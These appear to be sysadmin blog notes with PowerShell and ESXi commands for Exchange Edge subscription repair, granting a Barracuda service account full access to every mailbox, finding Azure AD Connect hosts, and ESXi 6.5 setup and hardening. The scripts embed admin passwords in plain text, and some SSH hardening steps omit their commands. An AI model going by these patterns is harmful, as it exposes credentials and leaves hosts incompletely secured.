Get-EdgeSubscription | Remove-EdgeSubscription

On Edge

# Clean up old certs
lmcert.msc > remove Microsoft Exchange ADAM from Personal Certs folder

# Remove Edge Subscription
Get-EdgeSubscription | Remove-EdgeSubscription

# Generate new subscription file
New-EdgeSubscription -Filename c:\newEdgeSubscription.xml
Re-start the Microsoft Exchange ADAM

On Hub server
# New-EdgeSubscription -FileData ([byte[]]$(Get-Content -Path "\\EXCH-EDGE\c$\newEdgeSubscription.xml" -Encoding Byte -ReadCount 0)) #Experimental command
New-EdgeSubscription -Filename c:\newEdgeSubscription.xml
Start-EdgeSynchronization
Test-EdgeSynchronization

[PS] C:\Windows\system32>New-EdgeSubscription -Filename c:\newEdgeSubscription.xml

Confirm
If you create an Edge Subscription, this Edge Transport server will be managed via EdgeSync replication. As a result,
any of the following objects that were created manually will be deleted: accepted domains, message classifications,
remote domains, and Send connectors. After creating the Edge Subscription, you must manage these objects from inside
the organization and allow EdgeSync to update the Edge Transport server. Also, the InternalSMTPServers list of the
TransportConfig object will be overwritten during the synchronization process.
EdgeSync requires that this Edge Transport server is able to resolve the FQDN of the Hub Transport servers in the
Active Directory site to which the Edge Transport server is being subscribed, and those Hub Transport servers be able
to resolve the FQDN of this Edge Transport server. You should complete the Edge Subscription inside the organization in
the next "1440" minutes before the bootstrap account expires.
[Y] Yes [A] Yes to All [N] No [L] No to All [S] Suspend [?] Help (default is "Y"): y


New-EdgeSubscription : Microsoft Exchange couldn't create or update the Edge Subscription account on the Edge Transport
server for the following reason: The LDAP server is unavailable.. Stack is at System.DirectoryServices.Protocols.LdapConnection.Connect()
at system.DirectoryServices.Protocols.LdapConnection.BindHelper(NetworkCredential newCredential, Boolean needSetCredential)
at Microsoft.Exchange.MessageSecurity.EdgeSync.AdamUserManagement.CreateOrUpdateADAMPrincipal(String user, String password, Boolean bootStrapAccount, TimeSpan expiry)
at Microsoft.Exchange.Management.SystemConfigurationTasks.NewEdgeSubscription.InitiateSubscriptionOnEdge()
At line:1 char:21
+ New-EdgeSubscription <<<< -Filename c:\newEdgeSubscription.xml
+ CategoryInfo : InvalidOperation: (:) [New-EdgeSubscription], InvalidOperationException
+ FullyQualifiedErrorId : 780DB3C3,Microsoft.Exchange.Management.SystemConfigurationTasks.NewEdgeSubscription

# Check status of Exchange ADAM Services
Get-Service *ADAM* | ft Di*,St*

# Check Exchange certificates
[PS] C:\Windows\system32>Get-ExchangeCertificate | fl

AccessRules : {System.Security.AccessControl.CryptoKeyAccessRule, System.Security.AccessControl.CryptoKeyAccessR
ule}
CertificateDomains : {ab0ee702-f37f-4dff-bfb2-66698a441d9a}
HasPrivateKey : True
IsSelfSigned : False
Issuer : CN=280b6975-b30a-4f5b-b2c3-7864e37f1c05
NotAfter : 8/9/2119 1:36:53 PM
NotBefore : 8/9/2019 12:36:53 PM
PublicKeySize : 2048
RootCAType : Unknown
SerialNumber : 73AC7DDB217BA7AF44847CC68A8B9CC9
Services : None
Status : Invalid
Subject : CN=ab0ee702-f37f-4dff-bfb2-66698a441d9a
Thumbprint : CFD78D7F9DFAA0BD537B3755C24089CE3ED0EC55

AccessRules :
CertificateDomains : {EXCH-EDGE, EXCH-EDGE.intra.net}
HasPrivateKey : True
IsSelfSigned : True
Issuer : CN=EXCH-EDGE
NotAfter : 10/11/2017 11:09:54 PM
NotBefore : 10/11/2012 11:09:54 PM
PublicKeySize : 2048
RootCAType : Registry
SerialNumber : 5DC03A0D09D1C594468C11CE9EC919D4
Services : SMTP
Status : DateInvalid
Subject : CN=EXCH-EDGE
Thumbprint : 4157434692710986BAC026FD2DFE32D4352DE9B3

AccessRules :
CertificateDomains : {intra.net, www.intra.net, exch-cas.intra.net, apollo.inglewood.kimconnect.com, autodisc
over.intra.net, autodiscover.inglewood.kimconnect.com, pop.inglewood.kimconnect.com, imap.inglewood.kimconnect.com, inglewood.kimconnect.com, legacy.intra.net, legacy.inglewood.kimconnect.com}
HasPrivateKey : True
IsSelfSigned : False
Issuer : SERIALNUMBER=07969287, CN=Go Daddy Secure Certification Authority, OU=http://certificates.godaddy.
com/repository, O="GoDaddy.com, Inc.", L=Scottsdale, S=Arizona, C=US
NotAfter : 5/16/2016 11:18:35 AM
NotBefore : 5/16/2011 11:18:35 AM
PublicKeySize : 2048
RootCAType : ThirdParty
SerialNumber : 2B94032E16C980
Services : SMTP
Status : DateInvalid
Subject : CN=intra.net, OU=Domain Control Validated, O=intra.net
Thumbprint : A05FBA0E72AD3D3E666973C9AFDE378535E24393

=============================================================================================

# Create New Cert
$domain="EXCH-EDGE"
$fqdn="exch-hub.intra.net"
$friendlyName="Exchange Certificate"
New-ExchangeCertificate -FriendlyName $friendlyName -SubjectName CN=$domain -DomainName $domain,$fqdn -PrivateKeyExportable $true #Optional:-Services SMTP -KeySize 2048

# Check for self-signed certs
Get-ExchangeCertificate | where {$_.Status -eq "Valid" -and $_.IsSelfSigned -eq $true} | Format-List FriendlyName,Subject,CertificateDomains,Thumbprint,NotBefore,NotAfter

# Restart Exchange Transport
Stop-Service MSExchangeTransport
Start-Service MSExchangeTransport

# Create new Subscription on Edge servers:
New-EdgeSubscription -Filename c:\newEdgeSubscription.xml

# Import subscription on Hub server
New-EdgeSubscription -Filename c:\newEdgeSubscription.xml

# On Hub, trigger New Edge Susbcription via Exchange Management Console GUI
$site='intra.net/Configuration/Sites/DistrictOffice'
New-EdgeSubscription -FileData '<Binary Data>' -Site $site -CreateInternetSendConnector $true -CreateInboundSendConnector $true

# Trigger sync
start-edgesynchronization -forcefullsync

# Restart Exchange Transport
Stop-Service MSExchangeTransport
Start-Service MSExchangeTransport

# Check mail queue
Get-Queue

# Check logs, navigate to:
%exchangeinstallpath%\TransportRoles\Logs\ProtocolLog\SmtpReceive

# Create new connector to point to the smart host (Barracuda spam filter). Make sure that the Source of Send Connector is Edge Server (not Hub Server)
# Disable the automatically generated connector that does not use the smart host

# Example of mail flow issue when the smart host does not accept connections from the Hub server. Resolution was to change the connector Source to the Edge transport

[PS] C:\Windows\system32>Get-Queue

Identity DeliveryType Status MessageCount NextHopDomain
-------- ------------ ------ ------------ -------------
exch-hub\1639048 MapiDelivery Active 17 school-mailboxdb3
exch-hub\1639053 SmartHost... Retry 5675 [10.10.1.11]
exch-hub\1639058 MapiDelivery Active 10 do-mailboxdb
exch-hub\1639059 MapiDelivery Active 12 school-mailboxdb4
exch-hub\1639060 MapiDelivery Active 14 school-mailboxdb2
exch-hub\Submission Undefined Ready 103 Submission
exch-hub\Shadow\1591071 ShadowRed... Ready 62 EXCH-EDGE.intra.net
exch-hub\Shadow\1639036 ShadowRed... Ready 166 EXCH-EDGE.intra.net

[PS] C:\Windows\system32>Get-Queue -Identity exch-hub\1639053 | fl #where 1639053 is Identity of the smart host

RunspaceId : b2e3dae0-ecb1-4508-b307-31da04271141
DeliveryType : SmartHostConnectorDelivery
NextHopDomain : [10.10.1.11]
TlsDomain :
NextHopConnector : 77215356-bf27-49bc-bd41-4603375ac561
Status : Retry
MessageCount : 5656
LastError : 451 4.4.0 Primary target IP address responded with: "421 4.4.2 Connection dropped due to SocketE
rror." Attempted failover to alternate host, but that did not succeed. Either there are no alter
nate hosts, or delivery failed to all alternate hosts.
LastRetryTime : 8/9/2019 5:45:39 PM
NextRetryTime : 8/9/2019 5:50:39 PM
DeferredMessageCount : 0
QueueIdentity : exch-hub\1639053
Identity : exch-hub\1639053
IsValid : True

Barracuda Message Archiver & Office 365 Exchange Online Service Account Configuration

The following script grant an Office 365 Exchange online service account necessary permissions on Exchange Server to enable the Barracuda Message Archiver access to all mailboxes.

# Office 365 Global Admin Credential
$username="GLOBALADMIN@kimconnect.com"
$password=ConvertTo-securestring "PASSWORD" -AsPlainText -Force
$cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $username,$password
# $cred = Get-Credential

# Connect to Office 365
if (!(Get-Module -ListAvailable -Name MSOnline)){Install-Module MSOnline -Confirm:$false -Force;}
$O365Session = New-PSSession -ConfigurationName Microsoft.Exchange -ConnectionUri https://ps.outlook.com/powershell -Credential $cred -Authentication Basic -AllowRedirection
Import-PSSession $O365Session -AllowClobber

# Set permissions for Barracuda service account for all mailboxes on O365
$serviceAccount="barracuda_srv@kimconnect.com"
Get-Mailbox -ResultSize unlimited | Add-MailboxPermission -User $serviceAccount -AccessRights fullaccess -InheritanceType all -Automapping $false

Note: as newly created accounts will not inherit the newly set permissions unless access grants are triggered, this script should be set to run as a scheduled task; in which case, the plain-text password credential method should be converted to XML creds (I have that snippet somewhere on this site) and saved to a local directory for subsequent execution.

PowerShell: Microsoft Exchange to Require that all Senders are Authenticated

In this scenario, the business decision is to limit exposure of certain internal accounts to only allow those to receive emails from the same “Exchange Organization”. This is an extra measure to improve enterprise security posture by further reducing spams and potential messaging vulnerabilities.

# Set "Require that all senders are authenticated" for one account
$targetUsername="PORequests"
$targetObject = Get-ADUser -Filter 'SamAccountName -eq $targetUsername'
Set-ADUser $targetObject -Replace @{msExchRequireAuthToSendTo = $True}
# Set "Require that all senders are authenticated" for all Distribution Groups
$distributionGroups = Get-ADGroup -Filter 'groupcategory -eq "distribution"'
ForEach ($group In $distributionGroups){
#$group.Name
Set-ADGroup $group -Replace @{msExchRequireAuthToSendTo = $True}
}

PowerShell: Find Azure AD Connect Servers

Azure AD Connect is a prevalent topic of the day. However, it is best practice to only have one instance installed per Active Directory forest. Yup, this thing can serve multiple domains of an entire forest. In fact, transitive trusts between forests would enable a single instance of AD Connect to sync accounts from domains of different forests. Blah blah blah… Do not install multiple instances of this thing. Here’s a way for you to quickly locate this Azure AD Connect host(s) in your environment.

Method 1: Search in Active Directory

# 1-liner to find the server(s) where AD Connect was used
(Get-ADUser -filter 'name -like "Msol*"' -Properties Description).Description | %{[void]($_ -match "computer\s(.+)\sconfigured");$matches[1]}

# Other methods to retrieve additional variables
$regexMatchAdConnectServers="computer\s(.+)\sconfigured"
$adConnectServers=(Get-ADUser -filter 'name -like "Msol*"' -Properties Description).Description | %{[void]($_ -match $regexMatchAdConnectServers);$matches[1]}
$adConnectServers

# Other variables
# $adConnectUsernames=(Get-ADUser -filter 'name -like "Msol*"').SamAccountName;
# $adConnectAccountDescriptions | %{$splitOnKeywordBefore = ($_ -split "computer ")[1];$splitOnKeywordAfter = ($splitOnKeywordBefore -split " configured")[0]; $splitOnKeywordAfter}
PS C:\Windows> (Get-ADUser -filter 'name -like "Msol*"' -Properties Description).Name
MSOL_xxxxxxxxxxxxxx
PS C:\Windows> Get-ADUser -filter 'name -like "Msol*"' -Properties Description


Description : Account created by Microsoft Azure Active Directory Connect with installation identifier
xxxxxxxxxxxxxx running on computer TOR-ADFS01 configured to synchronize to
tenant vectorusa.com. This account must have directory replication permissions in the local Active
Directory and write permission on certain attributes to enable Hybrid Deployment.
DistinguishedName : CN=MSOL_6a1e57285b53,CN=Users,DC=intranet,DC=kimconnect,DC=com
Enabled : True
GivenName :
Name : MSOL_xxxxxxxxxxxxxx
ObjectClass : user
ObjectGUID : 3f6aa813-fe12-42fd-ab27-xxxxxxxxxxxxxx
SamAccountName : MSOL_xxxxxxxxxxxxxx
SID :
Surname :
UserPrincipalName :

Method 2: Search on Office 365

# Office 365 Global Admin Credential
$username="GLAOBAO-ADMING@kimconnect.com"
$password=ConvertTo-securestring "PASSWORT" -AsPlainText -Force
$cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $username,$password
#$cred = Get-Credential

# Connect to Office 365
if (!(Get-Module -ListAvailable -Name MSOnline)){Install-Module MSOnline -Confirm:$false -Force;}
# Install-Module AzureAD -Confirm:$false -Force # Azure AD may not be necessary for managing O365
$O365Session = New-PSSession -ConfigurationName Microsoft.Exchange -ConnectionUri https://ps.outlook.com/powershell -Credential $cred -Authentication Basic -AllowRedirection
Import-PSSession $O365Session -AllowClobber
Connect-MsolService -Credential $cred

# Collect O365 accounts with the prefix of Sync_ and then use regex to retrieve names of associated computer names
$azureSyncAccounts=(Get-MsolUser -EnabledFilter EnabledOnly -MaxResults unlimited | Where-Object {$_.UserPrincipalName -like "Sync_*"}).UserPrincipalName
$azureSyncAccounts | %{[void]($_ -match "_(.+)_");$matches[1]}

ESXi 6.5 Installation Instructions

Prepare to Install


⦁ Reserve host Management & vMotion IPs

⦁ Pick an available IP from the IP tracking spreadsheet
⦁ Ping such IP’s to ensure that it is not being used by an existing device
⦁ Confirm with Systems/Network Team that such IP could be assigned without conflicts

⦁ Add DNS entry of new host into Active Directory Integrated DNS

⦁ Access a DNS server
⦁ Run MMC DNS utility to add A-host and Reverse Lookup records for new host following the below example

⦁ Install SSH client & Internet browser onto client workstation

⦁ Add a SSH console such as OpenSSH Client or Putty
⦁ Verify that IExplorer, Chrome, or Firefox with HTML5 capability is available

⦁ Verify that the ISO is available at this path: ⦁ \\nas\System Engineering\Software\VMware\
⦁ Apply Server Profile

⦁ Prior to applying a server profile, the targeted host must be turned off: OneView > Server Hardware > Select the appropriate Server Item > Click on Actions > Power Off

 

⦁ Create Server Profile

OneView > Server Hardware > Select the appropriate Server Item > Click on “Create Profile” from the Hardware section > mimic this screenshot to apply an ESXi Template

Initialize ESXi host

⦁ Launch iLO Console to mount the ESXi virtual ISO

⦁ Access OneView > Server Profiles > Actions > Launch Console

⦁ Assuming that the HTML5 or Java iLO Web Part has already been installed prior, this screen should appear

⦁ “Virtual Drives” is set via the Image File option

Begin the Install

⦁ Click on Power Switch and allow POST to proceed and pause at this screen

⦁ Click Continue and follow the prompt to arrive here

⦁ Do not perform an in place upgrade with older version if prompted. Select overwrite for installation.
⦁ Generate the root password according to our standardized requirements
⦁ Input the host’s root password into Passwords Safe
⦁ Press F2 to log into the console for the initial “System Customization”
⦁ From the “Troubleshooting Options” screen, Enable the ESXi Shell and SSH

⦁ Set management console IP, subnet and default gateway (sample below)

⦁ Disable IPv6 configuration

⦁ Set in lower case the FQDN hostname and DNS servers:
⦁ Mars: Primary 10.10.10.10 Secondary 10.10.10.11
⦁ Venus: Primary 10.10.20.10 Secondary 10.10.20.11

⦁ Set the domain name for Custom DNS Suffixes

⦁ Test Management Network Settings
⦁ Ping the management console IP to test the network settings.
⦁ Verify setup by using the Testing Management Network utility

Perform More Configurations via SSH

Engineers may prefer to use the console shell or another SSH client such as putty to execute these lines. These instructions are intended for those that already have familiarity with ESXi servers and CLI commands. Thus, CLI tools availability on the Engineer’s PC is assumed.

Isolation Tools

⦁ Execute the following command from the CLI as the root user:

cp -p /etc/vmware/config /etc/vmware/config.orig

echo 'isolation.tools.copy.disable = "FALSE"' >> /etc/vmware/config

echo 'isolation.tools.paste.disable = "FALSE"' >> /etc/vmware/config

cat /etc/vmware/config
Add centralized logging

⦁ Execute the following command from the CLI (assuming 10.10.10.100 is the syslog server):

esxcli system syslog config set --loghost='udp://10.10.10.100:514'

esxcli system syslog reload

esxcli network firewall ruleset set --ruleset-id=syslog --enabled=true

esxcli network firewall refresh
  • Check settings
[KIMCONNECT\admin@FLO-ESX05:~] esxcli system syslog config get
Default Network Retry Timeout: 180
Dropped Log File Rotation Size: 100
Dropped Log File Rotations: 10
Enforce SSLCertificates: true
Local Log Output: /scratch/log
Local Log Output Is Configured: false
Local Log Output Is Persistent: true
Local Logging Default Rotation Size: 1024
Local Logging Default Rotations: 8
Log To Unique Subdirectory: false
Message Queue Drop Mark: 90
Remote Host: udp://10.10.10.100:514
ESXi Storage configuration
Change default pathing policy and IOPS options

⦁ Execute the following command from the CLI to set the default PSP:

esxcli storage nmp satp set --default-psp=VMW_PSP_RR --satp=VMW_SATP_ALUA

⦁ Use the following command to create a custom SATP rule that will allow the ESXi host to configure the HPE 3PAR LUNs to use Round Robin multipath policy. The command must be executed on each ESXi host that is connected to the HPE 3PAR array.

esxcli storage nmp satp rule add -s "VMW_SATP_ALUA" -P "VMW_PSP_RR" -O "iops=1" -c "tpgs_on" -V "3PARdata" -M "VV" -e "HPE 3PAR Custom Rule"

⦁ Verify the new rule using the following commands:

esxcli storage nmp device list
esxcli storage nmp satp list
esxcli storage nmp satp rule list | grep "3PARdata"

⦁ Set the queue-full-threshold parameter to a value less than or equal to queue-full-sample-size:

esxcli system settings advanced set -o /Disk/QFullSampleSize -i "32"
esxcli system settings advanced set -o /Disk/QFullThreshold -i "4"

⦁ Disable ATS heartbeats:

esxcli system settings advanced set -i 0 -o /VMFS3/UseATSForHBOnVMFS5

⦁ Review settings:

esxcli system settings advanced list -o /VMFS3/UseATSForHBonVMFS5

Secure ESXi Host
Configure TLS

Run the following command to only enable TLS1.2 for the UserVars.ESXiVPsDisabledProtocols Advanced setting

esxcli system settings advanced set -o /UserVars/ESXiVPsDisabledProtocols -s "sslv3,tlsv1,tlsv1.1"

Edit the config.xml file
⦁ Make a backup of config.xml

cp -p /etc/vmware/rhttpproxy/config.xml /etc/vmware/rhttpproxy/config.xml_orig

⦁ Edit the config file using vi text editor

vi /etc/vmware/rhttpproxy/config.xml

⦁ Type /ssl to search for that keyword > press enter > edit the SSL section with this:

<ssl>
<doVersionCheck> true </doVersionCheck><!-- allowed SSL/TLS protocol versions --><protocols>tls1.2</protocols>
<cipherList>!aNULL:kECDH+AESGCM:ECDH+AESGCM:!RSA+AESGCM:kECDH+AES:ECDH+AES:!RSA+AES</cipherList>
<libraryPath>/lib/</libraryPath>
</ssl>
Add TLS and Cipher Settings

TLS and Cipher settings are set inside the configuration file of the small footprint CIM broker (SFCB) since that Common Information Model (CIM) provider controls sfcbd and openwsman in ESXi 6.5. It must be disabled for changes in SFCB to become effective.

⦁ Disable the WBEM and execute the following commands

esxcli system wbem set --enable false

⦁ Make a backup of fscb.cfg

cp -p /etc/sfcb/sfcb.cfg /etc/sfcb/sfcb.cfg_orig

⦁ Append some lines to the tail of sfcb.cfg file

cat << EOT >> /etc/sfcb/sfcb.cfg
enableTLSv1:false
enableTLSv1_1:false
enableTLSv1_2:true
sslCipherList:!aNULL:kECDH+AESGCM:ECDH+AESGCM:kECDH+AES:ECDH+AES
EOT

⦁ Re-enable the WBEM services.

esxcli system wbem set --enable true
Disable remote SSH root login and CBC cipher

These procedures will require a host reboot or systems reload to become effective. Please be advised that once this policy is active, CLI root commands will be prevented.

⦁ Backup the sshd_config file prior to changing it

cp -p /etc/ssh/sshd_config /etc/ssh/sshd_config.orig

⦁ Execute the following command from the CLI to disable remote root login and CBC Ciphers

⦁ Execute the following command to confirm new settings

cat /etc/ssh/sshd_config
Optional: Re-enable SSH Root Login

In the event that SSH root login is required (or when Active Directory integration is broken), this is the method to reverse changes in previous sub-section.

⦁ Gain console access to ESXi host
⦁ If using HPE OneView: click on OneView > Server Profiles > highlight the correct ESXi host name > click on Actions > Launch Console
⦁ If using iLO: simply login to the iLO IP address or hostname of the intended machine and launch console
⦁ Edit sshd_config via ESX Shell within console
⦁ At the login screen, press Alt + F1 to enter Shell Mode
⦁ Execute the following command from the CLI to disable remote root login and CBC Ciphers:
⦁ Restart sshd
/etc/init.d/SSH restart
⦁ Exit Shell Mode by pressing Alt + F2

Further Configuration via Web UI

⦁ Navigate to the ESXi server Web UI URL using iExplore or Chrome: https://servername_or _IP/

⦁ Uncheck Join the VMware Customer Experience Improvement Program. This prompt only appears once upon initial login.

⦁ Right click on Host to “Enter Maintenance mode”

⦁ Set Admin Groups

⦁ Navigate to the “Manage” menu, click on the “System” tab and under Advanced Settings, rename the “Config.HostAgent.plugins.hostsvc.esxAdminsGroup” value to “VMware Enterprise Admins”

⦁ On the “System” tab under Advanced Settings, change the “UserVars.SuppressShellWarning” value to “1”

Configure time sources

⦁ Navigate to Manage > System > Time & date > Edit settings
⦁ Select Start and stop with host for the NTP Service Start Policy
⦁ Set the appropriate NTP Servers by separate them with commas
10.10.10.10, 10.10.10.11 (DC1 & DC2)
⦁ Save settings
⦁ Click on Actions > NTP Service > Start

Set Certificates
Rename local data stores

Navigate to the “Storage” menu > rename the local Datastore to HOSTNAME_001 (e.g. FLO-ESX05_001)

Join Active Directory

⦁ Click on “Manage” > “Security and users” > “Authentication > “Join Domain”
⦁ Use a Domain Admin account to complete this step

Configure Networking

⦁ Click on “Networking” > right-click “VM Network” > Remove
⦁ Select Virtual Switches tab > right-click vSwitch0 > Add Uplink > configure all the Security settings to Reject > Save

⦁ Click Add standard virtual switch > name it vSwitch1 > set vmnic 6 as uplink 1 > Add > right-click vSwitch1 > Add uplink > select vmnic7 > Save

⦁ Select the VMKernel NICs tab > Add VMkernel NIC > set New port group as “vMotion” > click IPv4 settings > input an assigned static IP and Subnet mask > set TCP/IP stack as “vMotion stack” > Create

⦁ Click on Port groups tab > add a new port group with the format of 082_10.X.X to vSwitch0

⦁ Right-click “Management Network” port group > NIC Teaming > confirm the Override failover order for the NIC teaming of “vmnic1” as “Standby” > Save

⦁ Right-click “vMotion” port group > NIC Teaming > set NIC Teaming Failover order of“vmnic0” as “Standby” > Save

⦁ Select Port groups tab > add a new port group name vCSA-HA to vSwitch1 with default settings

⦁ Select Port groups tab > add a new port group name MSCS to vSwitch1 with defaults settings

vCenter Integration
Add ESXi host to vCenter

⦁ Log into the vCenter vSphere Web Client and add the ESXi host to the data center object.
⦁ This screenshot is showing a new host addition to the LAS cluster

Licensing

⦁ Licensing options may already have been set in the previous step. In case it has been bypassed, here is the sequence to access this screen:
Select host > Configure > System > Licensing > Assign License

⦁ Associate new host with a valid license (VMware vCloud Suite Advanced for vSphere 6)

Configure with vSphere Distribute Switch

This section assumes that Distributed Switch(es) are already created prior, and that our new ESXi host is to be added into such Distributed Switches

⦁ From the “Networking” tab, locate and right-click on the desired “vSphere Distributed Switch”

⦁ Click on “Add and Manage Host,” then follow the wizard to completion while match these hinting screenshots
⦁ Uncheck the default selection of “Manage VMkernel adapters” while following the wizard prompts

⦁ Set vmnic4 & vmnic5 as uplinks


Update VMWare Host
VMWare Update Manager

⦁ Ensure that the host is in “Maintenance” mode.
⦁ From the “Update Manager” tab, highlight the server and click on the “Scan” link from the top right corner.
⦁ After the scan has completed, click on the “Stage Patches” button. Select these baselines to stage the targeted host:

⦁ Critical Host Patches (Predefined)
⦁ Non-Critical Host Patches (Predefined)

⦁ Click on Remediate and apply the patches using the default choices presented by the wizard. The machine will reboot during this process.

⦁ Enabling the ESXi Side-Channel-Aware Scheduler using the vSphere Web Client.

Click on Configure > Advanced System Settings > Search for “VMkernel.Boot.HyperthreadingMitigation” > Edit > Search for “Restrict” > select “Enabled” > OK

Scan for Vulnerabilities

⦁ Notify Information Security team to perform a risk assessment with a vulnerability scan.
⦁ Remediate any identified vulnerabilities.

Validate Machine Production Ready

⦁ Move one test VM to this new ESXi host to verify functionality (like login, ping from remote host…).

Set Host as Ready for production

⦁ Move the ESXi host to the proper cluster.
⦁ Notify Infrastructure team of the new ESXi host availability

Troubleshooting Section

⦁ Unable to connect via vSphere Client with this error:

Resolution: install the correct version of vSphere Client or use the browser based version of vSphere client to connect to the ESXi host.

⦁ How to restart all services on ESXi without a reboot

services.sh restart

⦁ Restart host management agents

/etc/init.d/hostd restart
/etc/init.d/vpxa restart

HPE: Gen8 Bios Settings to Prepare Host for Virtualization Role

Proliant Gen8 Blade Servers

HP Servers are often chosen as VMWare & Hyper-V hosts. To further optimize these “pizza boxes” for their intended purposes, here are the steps to prep these things:

At cold boot, select the “System Options” menu > choose option “Disabled” for each NICs from “Network Boot” capability

“Power Management Options” menu > “HP Power Profile” > select “Maximum Performance”

“Power Management Options” menu > “Advanced Power Management Options” > select “Maximum Performance” for the “Memory Power Savings Mode”

Set the correct date and time in the “Date and Time” menu
 

“Advanced Options | Advanced System ROM Options” menu > select “Disabled” for the “Power-on Logo

“Advanced Options | Advanced Performance Tuning Options” menu > select “Enabled” for the “ACPI SLIT Preferences”

Also set “Intel Performance Counter Monitor (PCM)”

Proliant Gen9 / Gen10 Servers

⦁ For Synergy Blade Servers the BIOS settings are pre-configured in the Server Profile Template.
⦁ For HPE Synergy Blade servers, use the Composer to create a Server Profile using the ESXi template to apply it to the appropriate server hardware.
⦁ This screenshot provides the expected BIOS settings.